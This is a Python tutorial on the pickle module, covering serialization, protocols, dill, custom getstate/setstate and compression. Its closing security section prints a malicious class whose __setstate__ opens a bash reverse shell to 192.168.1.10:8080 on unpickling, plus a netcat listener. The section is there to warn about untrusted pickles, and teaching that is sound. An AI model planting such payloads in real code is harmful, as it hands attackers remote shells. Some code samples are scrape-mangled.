Pickle Module of Python
A developer may sometimes want to send some complex object commands through the network and save the internal state of their objects to the disk or database for using it later. To achieve this, the developer can use the serialization process, which is supported by the standard library, cause of Python’s Pickle Module.
In this tutorial, we will discuss serializing and deserializing the object and which module the user should use for serializing the objects in python. The kind of objects can be serialized by using the Pickle module in python. We will also explain how to use the Pickle module for serializing the object hierarchies and what are the risks a developer can face while deserializing the object from the untrusted
source?
Serialization in Python
The process of serializing is to convert the data structure into a linear form, which can be stored or transmitted through the network.
In Python , the serialization allows the developer to convert the complex object structure into a stream of bytes that can be saved in the disk or can send through the network. The developer can refer to this process as marshalling. Whereas, Deserialization is the reverse process of serialization in which the user takes the stream of bytes and transforms it into the data structure. This process can be referred to as unmarshalling.
The developer can use serialization in many different situations. And one of them is saving the internal state of the neural networking after processing the training phase so that they can use the state later and they don’t have to do the training again.
In Python there are three modules in the standard library that allows the developer to serialize and deserialize the
objects:
- The pickle module
- The marshal module
- The json module
Python also supports XML , which developers can use for serializing the objects.
The json Module is the latest module out of the three. This allows the developer to work beside standard JSON files. Json is the most suitable and commonly used format for data exchange.
There are numerous reasons for choosing the JSON
format:
- It is Human Readable
- It is Language Independent
- It is Lighter than XML
With json Module, the developer can do serializing and deserializing different standard Python
types:
- List
- dict
- string
- int
- tuple
- bool
- float
- None
The oldest module in these three modules is the marshal module. Its primary purpose is reading and writing the compiled bytecode of Python modules, or the .pyc files which the developer gets when the Python module is imported by the interpreter. Therefore, the developer can use the marshal module for serializing the object it is not recommended.
The pickle module of Python is another method of serializing and deserializing the objects in Python. This is different from json module as in this. The object is serialized in the binary format, whose result is not readable by humans. Although, it is faster than the others, and it can work with many other python types, including the developer’s custom -defined objects.
So, the developer can use many different methods for serializing and deserializing the objects in Python. The three important guidelines for concluding which method is suitable for the developer’s case
are:
- Do not use the marshal module, as it is used mostly by the interpreter. And the official documentation warns that the maintainers of the Python can modify the format in backward -incompatible types.
- The XML and json modules are safe choices if the developer wants interoperability with different languages and human -readable format.
- The Python pickle module is the best choice for all the remaining cases. Suppose the developer does not want a human -readable format and a standard interoperable format. And they require to serialize the custom objects. Then they can choose the pickle module.
Inside The pickle Module
The pickle module of python contains the four
methods:
- dump( obj, file, protocol = None, * , fix_imports = True, buffer_callback = None)
- dumps( obj, protocol = None, * , fix_imports = True, buffer_callback = None)
- load( file, * , fix_imports = True, encoding = ” ASCII “, errors = “strict “, buffers = None)
- loads( bytes_object, * , fix_imports = True, encoding = ” ASCII “, errors = ” strict “, buffers = None)
The first two methods are used for the pickling process, and the next two methods are used for the unpickling process.
The difference between dump() and dumps() is that dump() creates the file which contains the serialization results, and the dumps() returns the string.
For differentiation dumps() from the dump(), the developer can remember that in the dumps() function, ‘ s’ stands for the string.
The same concept can be applied to the load() and loads() function. The load() function is used for reading the file for the unpickling process, and the loads() function operates on the string.
Suppose the user has a custom -defined class named forexample class with many different attributes, and each one of them is of different
types:
- the_number
- the_string
- the_list
- the_dictionary
- the_tuple
The example below explains how the user can instantiate the class and pickle the instance to get the plain string. After pickling the class, the user can modify the value of its attributes without affecting the pickled string. User can afterward unpickle the string which was pickled earlier in another variable, and restore the copy of the pickled class. For example:
-
# pickle.py
-
import
pickle
-
-
class
forexample_class:
-
the_number =
25
-
the_string =
” hello”
-
the_list = [
1
,
2
,
3
]
-
the_dict = {
” first ”
:
” a ”
,
” second ”
:
2
,
” third ”
: [
1
,
2
,
3
] }
-
the_tuple = (
22
,
23
)
-
-
user_object = forexample_class()
-
-
user_pickled_object = pickle.dumps( user_object ) # here, user is Pickling the object
-
print( f
” This is user’s pickled object: \n { user_pickled_object } \n ”
)
-
-
user_object.the_dict = None
-
-
user_unpickled_object = pickle.loads( user_pickled_object ) # here, user is Unpickling the object
-
print(
-
f
” This is the_dict of the unpickled object: \n { user_unpickled_object.the_dict } \n ”
)
Output:
This is user's pickled object: b' \x80 \x04 \x95$ \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x8c \x08__main__ \x94 \x8c \x10forexample_class \x94 \x93 \x94) \x81 \x94. ' This is the_dict of the unpickled object: {' first ': ' a ', ' second ': 2, ' third ': [ 1, 2, 3 ] }
Example –
Explanation
Here, the process of pickling has ended correctly, and it stores the user’s whole instance in the string: b’ \x80 \x04 \x95$ \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x8c \x08 main__ \x94 \x8c \x10forexample class \x94 \x93 \x94) \x81 \x94. ‘After completing the process of pickling, the user can change their original objects making the dict attribute equals to None.
Now, the user can process for unpickling the string into the utterly new instance. When the user gets a deep copy of their original object structure from the time when the process of pickling the object
began.
Protocol Formats of the Pickle Module in Python
The pickle module is python -specific, and its results can only be readable to another python program. Although the developer might be working with python, they should know that the pickle module is advanced now.
This means that if the developer has pickled the object with some specific version of python, they might not be able to unpickle the object with the previous version.
The compatibility of this depends on the protocol version that the developer used for the while process of pickling.
There are six different protocols that the Pickle module of python can use. The requirement of unpickling the most recent python interpreter is directly proportional to the highness of the protocol
version.
-
Protocol version 0 –
It was the first version. It is human readable no like the other protocols -
Protocol version 1 –
It was the first binary format. -
Protocol version 2 –
It was introduced in Python 2.3. -
Protocol version 3 –
It was added in Python 3.0. The Python 2.x version cannot unpickle it. -
Protocol version 4 –
It was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with
Python 3.8
. -
Protocol version 5 –
It was added in Python 3.8. It features support for
out-of-band data
and improved speeds for in-band data.
To choose a specific protocol, the developer has to specify the protocol version when they call dump(), dumps(), load() or loads() functions. If they do not specify the protocol, their interpreter will use the default version specified in the pickle.DEFAULT PROTOCOL
attribute.
Types of Pickleable and Unpickleable
We have already discussed that the pickle module of python can serialize much more types than the json module although everything is not pickleable.
The list of unpickleable objects also contains the database connections, running threads, opened network sockets, and many others.
If the user got stuck with the unpickleable objects, then there are few things they can do. The first option they have is to use the third -part library, for example, dill .
The dill library can extend the capabilities of the pickle. This library can let the user serialize fewer common types such as functions with yields, lambdas, nested functions, and many more.
For testing this module, the user can try to pickle the lambda function. For example:
-
# pickle_error.py
-
import
pickle
-
-
squaring = lambda x : x * x
-
user_pickle = pickle.dumps( squaring )
If the user tries to run this code, they will get an exception because the pickle module of python can not serialize the lambda function. Output:
PicklingError Traceback (most recent call last) <ipython-input-9-1141f36c69b9> in <module> 3 4 squaring = lambda x : x * x ----> 5 user_pickle = pickle.dumps(squaring) PicklingError: Can't pickle <function <lambda> at 0x000001F1581DEE50>: attribute lookup <lambda> on __main__ failed
Now, if the user replaces the pickle module with the dill library, they can see the difference. For example:
-
# pickle_dill.py
-
import
dill
-
-
squaring = lambda x: x * x
-
user_pickle = dill.dumps( squaring )
-
print( user_pickle )
After running the above program, the user can see that the dill library has serialized the lambda function without any error. Output:
b' \x80 \x04 \x95 \xb2 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x8c \ndill._dill \x94 \x8c \x10_create_function \x94 \x93 \x94 ( h \x00 \x8c \x0c_create_code \x94 \x93 \x94 ( K \x01K \x00K \x00K \x01K \x02KCC \x08| \x00| \x00 \x14 \x00S \x00 \x94N \x85 \x94 ) \x8c \x01x \x94 \x85 \x94 \x8c \x1f< ipython-input-11-30f1c8d0e50d > \x94 \x8c \x08< lambda > \x94K \x04C \x00 \x94 ) )t \x94R \x94c__builtin__ \n__main__ \nh \nNN } \x94Nt \x94R \x94. '
There is another interesting feature of dill library, such as it can serialize the whole interpreter session. For example:
-
squaring = lambda x : x * x
-
p = squaring(
25
)
-
import
math
-
q = math.sqrt (
139
)
-
import
dill
-
dill.dump_session(
‘ testing.pkl ‘
)
-
exit()
In the above example, the user has started the interpreter, imported the module, and then defined the lambda function along with a few of the other variables. They have then imported the dill library and called the dump session() function for serializing the whole session.
If the user has run the code correctly, then they would be getting the testing.pkl file in their current directory. Output:
$ ls testing.pkl 4 -rw-r--r--@ 1 dave staff 493 Feb 12 09:52 testing.pkl
Now, the user can start the new instance of the interpreter and load the testing.pkl file for resorting to their last session. For example:
-
globals().items()
Output:
dict_items( [ ( ' __name__ ' , ' __main__ ' ) , ( ' __doc__ ' , ' Automatically created module for IPython interactive environment ' ) , ( ' __package__ ' , None ) , ( ' __loader__ ' , None ) , ( ' __spec__ ' , None ) , ( ' __builtin__ ' , < module ' builtins ' ( built-in ) > ) , ( ' __builtins__ ' , < module ' builtins ' ( built-in ) > ) , ( ' _ih ' , [ ' ' , ' globals().items() ' ] ) , ( ' _oh ' , {} ) , ( ' _dh ' , [ ' C:\\Users \\User Name \\AppData \\Local \\Programs \\Python \\Python39 \\Scripts ' ] ) , ( ' In ' , [ ' ' , ' globals().items() ' ] ) , ( ' Out ' , {} ) , ( ' get_ipython ' , < bound method InteractiveShell.get_ipython of < ipykernel.zmqshell.ZMQInteractiveShell object at 0x000001E1CDD8DDC0 > > ) , ( ' exit ' , < IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70 > ) , ( ' quit ' , < IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70 > ) , ( ' _ ' , ' ' ) , ( ' __ ' , ' ' ) , ( ' ___ ' , ' ' ) , ( ' _i ' , ' ' ) , ( ' _ii ' , ' ' ) , ( ' _iii ' , ' ' ) , ( ' _i1 ' , ' globals().items() ' ) ] )
-
import
dill
-
dill.load_session(
‘ testing.pkl ‘
)
-
globals().items()
Output:
dict_items( [ ( ' __name__ ' , ' __main__ ' ) , ( ' __doc__ ' , ' Automatically created module for IPython interactive environment ' ) , ( ' __package__ ' , None ) , ( ' __loader__ ' , None ) , ( ' __spec__ ' , None ) , ( ' __builtin__ ' , < module ' builtins ' ( built-in ) > ) , ( ' __builtins__ ' , < module ' builtins ' ( built-in ) > ) , ( ' _ih ' , [ ' ' , " squaring = lambda x : x * x \na = squaring( 25 ) \nimport math \nq = math.sqrt ( 139 ) \nimport dill \ndill.dump_session( ' testing.pkl ' ) \nexit() " ] ) , ( ' _oh ' , {} ) , ( ' _dh ' , [ ' C:\\ Users\\ User Name \\AppData \\Local \\Programs \\Python \\Python39 \\Scripts ' ] ) , ( ' In ' , [ ' ' , " squaring = lambda x : x * x \np = squaring( 25 ) \nimport math\nq = math.sqrt ( 139 ) \nimport dill \ndill.dump_session( ' testing.pkl ' ) \nexit() " ] ) , ( ' Out ' , {} ) , ( ' get_ipython ' , < bound method InteractiveShell.get_ipython of < ipykernel.zmqshell.ZMQInteractiveShell object at 0x000001E1CDD8DDC0 > > ) , ( ' exit ' , < IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70 > ) , ( ' quit ' , < IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70 > ) , ( ' _ ' , ' ' ) , ( ' __ ' , ' ' ) , ( ' ___ ' , ' ' ) , ( ' _i ' , ' ' ) , ( ' _ii ' , ' ' ) , ( ' _iii ' , ' ' ) , ( ' _i1 ' , " squaring = lambda x : x * x \np = squaring( 25 ) \nimport math \nq = math.sqrt ( 139 ) \nimport dill \ndill.dump_session( ' testing.pkl ' ) \nexit() " ) , ( ' _1 ' , dict_items( [ ( ' __name__ ' , ' __main__ ' ) , ( ' __doc__ ' , ' Automatically created module for IPython interactive environment ' ) , ( ' __package__ ' , None ) , ( ' __loader__ ' , None ) , ( ' __spec__ ' , None ) , ( ' __builtin__ ' , < module ' builtins ' ( built-in ) > ) , ( ' __builtins__ ' , < module ' builtins ' ( built-in ) > )
-
p
Output:
625
-
q
Output:
22.0
-
squaring
Output:
(x)>
Here, the first globals().item() statement reveals that the interpreter is in the initial state, meaning that the developer has to import the dill library and invoke load session() for restoring their serialized interpreter session.
Developers should remember that if they are using the dill library instead of the pickle module, that standard library does not include the dill library. It is slower than the pickle module.
Dill library can serialize a wider range of objects than the pickle module, but it cannot solve every problem of serialization that the developer can face. If the developer wants to serialize the object which contains a database connection, then they cannot work with the dill library. That is an unserialized object for the dill library.
The solution to this problem is to exclude the object during the process of serialization for reinitializing the connection after the object is deserialized.
The developer can use the _getstate_() for defining which objects should be included in the pickling process and whatnot. This method allows the developer to specify what they want to pickle. If they do not override _getstate_(), then the _dict_() will be used, which is a default instance.
In the following example, the user has defined the class with several attributes and then excluded one of the attributes for the process of serialization by using _getstate_() ().
For
example:
-
# custom_pickle.py
-
-
import
pickle
-
-
class
foobar:
-
def __init__( self ):
-
self.p =
25
-
self.q =
” testing ”
-
self.r = lambda x: x * x
-
-
def __getstate__( self ):
-
attribute = self.__dict__.copy()
-
del attribute[
‘r’
]
-
return
attribute
-
-
user_foobar_instance = foobar()
-
user_pickle_string = pickle.dumps( user_foobar_instance )
-
user_new_instance = pickle.loads( user_pickle_string )
-
-
print( user_new_instance.__dict__ )
In the above example, the user has created the object with three attributes, and one of the attributes is a lambda, which is an unpickleable object for the pickle module. For solving this issue, they have specified in the _getstate_() which attribute to pickle. The user has cloned the whole _dict_ of the instance for defining all the attributes in the class, and then they have removed the unpickleable attribute ‘r’.
After running this code and then deserializing the object, the user can see that the new instance does not contain the ‘r’
attribute.
Output:
{'p': 25, 'q': ' testing '}
But if the user wants to do additional initialization during the process of unpickling, such as adding the excluded ‘r’ attribute back to the deserialized instance. They can do this by using the _setstate_() function.
For
example:
-
# custom_unpickle.py
-
import
pickle
-
-
class
foobar:
-
def __init__( self ):
-
self.p =
25
-
self.q =
” testing ”
-
self.r = lambda x: x * x
-
-
def __getstate__( self ):
-
attribute = self.__dict__.copy()
-
del attribute[
‘r’
]
-
return
attribute
-
-
def __setstate__(self, state):
-
self.__dict__ = state
-
self.c = lambda x: x * x
-
-
user_foobar_instance = foobar()
-
user_pickle_string = pickle.dumps( user_foobar_instance )
-
user_new_instance = pickle.loads( user_pickle_string )
-
print( user_new_instance.__dict__ )
Here, bypassing the excluded attribute ‘r’ to the _setstate_(), the user has ensured that the object will appear in the _dict_ of the unpickling
string.
Output:
{' p ': 25, ' q ': ' testing ', ' r ': < function foobar.__setstate__.< locals >.< lambda > at 0x000001F2CB063700 > }
Compression of the Pickle Objects
The pickle data format is the compact binary representation of the object structure, but still, the users can optimize their pickle string by compressing it with bzip2 or gzip.
For compressing the pickled string with bzip2, the user has to use the bz2 module, which is provided in the standard library of python.
For example, the user has taken the string and will pickle it and then compress it by using the bz2 module.
For
example:
-
import
pickle
-
import
bz2
-
user_string =
“”
“Per me si va ne la città dolente,
-
per me si va ne l’etterno dolore,
-
per me si va tra la perduta gente.
-
Giustizia mosse il mio alto fattore:
-
fecemi la divina podestate,
-
la somma sapienza e ‘l primo amore;
-
dinanzi a me non fuor cose create
-
se non etterne, e io etterno duro.
-
Lasciate ogne speranza, voi ch’intrate.
“”
”
-
pickling = pickle.dumps( user_string )
-
compressed = bz2.compress( pickling )
-
len( user_string )
Output:
312 len( compressed )
Output:
262
The user should remember that the smaller files come at the cost of the slower process. Security Concerns with the Pickle Module
Till now, we have discussed how to use the pickle module for serializing and deserializing the objects in Python. The process of serialization is convenient when the developer wants to save the state of their objects to disk or to transmit it through the network. Although, there is one more thing that the developer should know about the pickle module of python, that it is not very secure. As earlier, we have discussed the use of the _setstate_() function. This method is best for performing more initialization along with the unpickling process. Still, it is also used for executing arbitrary code during the unpickling process. There is nothing much a developer can do to reduce the risk. The basic rule is the developer should never unpickle the data which comes from the untrusted source or transmitted through the insecure network. For preventing the attacks, the user can use libraries like hmac for signing the data and making sure that it has not been tampered with. For example:
To see how unpickling the tampered pickle can expose the system of the user to the
attackers.
-
# remote.py
-
import
pickle
-
import
os
-
-
class
foobar:
-
def __init__( self ):
-
pass
-
-
def __getstate__( self ):
-
return
self.__dict__
-
-
def __setstate__( self, state ):
-
# The attack is from
192.168
.
1.10
-
# The attacker is listening on port
8080
-
os.system(‘/bin/bash -c
-
“/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1”
‘)
-
-
-
user_foobar = foobar()
-
user_pickle = pickle.dumps( user_foobar )
-
user_unpickle = pickle.loads( user_pickle )
Example –
In the above example, the process of unpickling has executed _setstate_(), which will execute a Bash command for opening the remote shell to the 192.168.1.10 system on port 8080.
This is how the user can safely test the scrip on their Mac or Linux box. First, they have to open the terminal and then use the nc command for listing the connection to port 8080.
For
example:
-
$ nc -l
8080
This terminal will be for attackers.
Then, the user has to open another terminal on the same computer system and execute the python code for unpicking the malicious code.
The user has to make sure that they have to change the IP address in the code for the IP address of their attacking terminal. After executing the code, the shell is exposed to the
attackers.
-
remote.py
Now, a bash shell will be visible on the attacking console. This console can be operated directly now, on the system which is attacked.
For
example:
-
$ nc -l
8080
Output:
bash: no job control in this shell The default interactive shell is now zsh. To update your account to use zsh, please run ` chsh -s /bin /zsh`. For more details, please visit https://support.apple.com /kb /HT208060. bash-3.1$